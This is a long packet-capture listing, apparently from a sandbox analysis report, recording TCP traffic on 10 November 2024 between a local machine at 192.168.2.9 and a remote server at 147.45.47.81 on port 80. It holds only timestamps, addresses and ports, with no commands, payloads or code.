                                                                                                                                                                                Nov 10, 2024 09:18:28.632390976 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.632401943 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.632410049 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.632421970 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.632473946 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.632487059 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.632499933 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.632513046 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.632525921 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.632544994 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.632590055 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.632630110 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.632642984 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.632656097 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.632692099 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.632704020 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.632726908 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.632739067 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.632750988 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.632791996 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.632824898 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.632836103 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.632848978 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.632883072 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.632883072 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.632905006 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.632915974 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.632935047 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.632947922 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.632976055 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.632977009 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.632989883 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.633002996 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.633011103 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.633017063 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.633064032 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.633064032 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.633122921 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.633178949 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.633188963 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.633203030 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.633217096 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.633227110 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.633236885 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.633297920 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.633316040 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.633328915 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.633342028 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.633342981 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.633357048 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.633368015 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.633405924 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.633405924 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.633449078 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.633460999 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.633471966 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.633512020 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.633512020 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.646102905 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.647257090 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.674118996 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.674159050 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.674170017 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.674180984 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.674221039 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.674253941 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.690139055 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.690151930 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.690197945 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.690258026 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.690272093 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.690284967 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.690323114 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.690324068 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.690340042 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.690352917 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.690366030 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.690377951 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.690393925 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.690393925 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.690396070 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.690412045 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.690428019 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.690468073 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.690644979 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.690655947 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.690669060 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.690681934 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.690692902 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.690711021 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.690717936 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.690721989 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.690732956 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.690746069 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.690751076 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.690751076 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.690784931 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.690917015 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.690937042 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.691009045 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.691015959 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.691029072 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.691041946 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.691054106 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.691085100 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.691085100 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.734738111 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.734764099 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.734781027 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.734811068 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.734836102 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.746720076 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.746803045 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.746819973 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.746833086 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.746848106 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.746860981 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.746885061 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.746891975 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.746901989 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.746913910 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.746917009 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.746923923 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.746939898 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.746958017 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.746958017 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.746970892 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.746970892 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.746990919 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.747000933 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.747011900 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.747014999 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.747036934 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.747057915 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.747071981 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.747100115 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.747138977 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.747149944 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.747189045 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.747206926 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.747225046 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.747272015 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.747276068 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.747320890 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.747332096 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.747347116 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.747364044 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.747376919 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.747384071 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.747421026 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.747421026 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.747440100 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.747451067 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.747461081 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.747468948 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.747481108 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.747494936 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.747503042 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.747508049 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.747534037 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.747560978 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.747596025 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.747596979 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.747632027 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.747643948 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.747669935 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.747682095 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.747730970 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.747735977 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.747821093 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.747870922 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.747883081 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.747883081 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.747895002 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.747925997 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.747942924 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.747955084 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.747967005 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.747981071 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.748023033 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.748023033 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.748023987 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.748063087 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.748078108 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.748085976 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.748132944 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.748142004 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.748153925 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.748166084 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.748198986 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.748323917 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.748382092 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.748393059 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.748404980 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.748416901 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.748456955 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.748456955 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.748466969 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.748478889 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.748491049 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.748594999 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.748615026 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.748655081 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.748666048 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.748683929 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.748711109 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.748723984 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.748774052 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.748785019 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.748924971 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.748927116 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.748936892 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.749018908 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.749027967 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.749039888 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.749052048 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.749088049 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.749103069 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.749108076 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.749121904 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.749131918 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.749135017 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.749147892 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.749178886 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.749181986 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.749209881 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.749241114 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.749428988 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.749588966 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.749593973 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.749598026 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.749639034 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.749649048 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.749660969 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.749674082 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.749686003 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.749700069 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.749711037 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.749715090 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.749715090 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.749757051 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.749861002 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.749872923 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.749885082 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.749918938 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.749919891 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.752290010 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.789679050 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.789691925 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.789702892 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.789709091 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.792551041 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.805721045 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.805763960 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.805774927 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.805794001 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.805809975 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.805823088 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.805835009 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.805840015 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.805840015 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.805854082 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.805866957 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.805881023 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.805896044 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.805896044 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.805919886 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.805934906 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.805939913 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.805952072 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.805974960 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.806016922 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.806030035 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.806042910 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.806056976 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.806061983 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.806106091 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.806180954 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.806193113 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.806225061 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.806246996 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.806291103 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.806324959 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.806338072 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.806349039 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.806386948 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.806601048 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.806619883 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.806631088 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.806654930 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.806687117 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.806710958 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.806724072 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.806735992 CET8049833147.45.47.81192.168.2.9
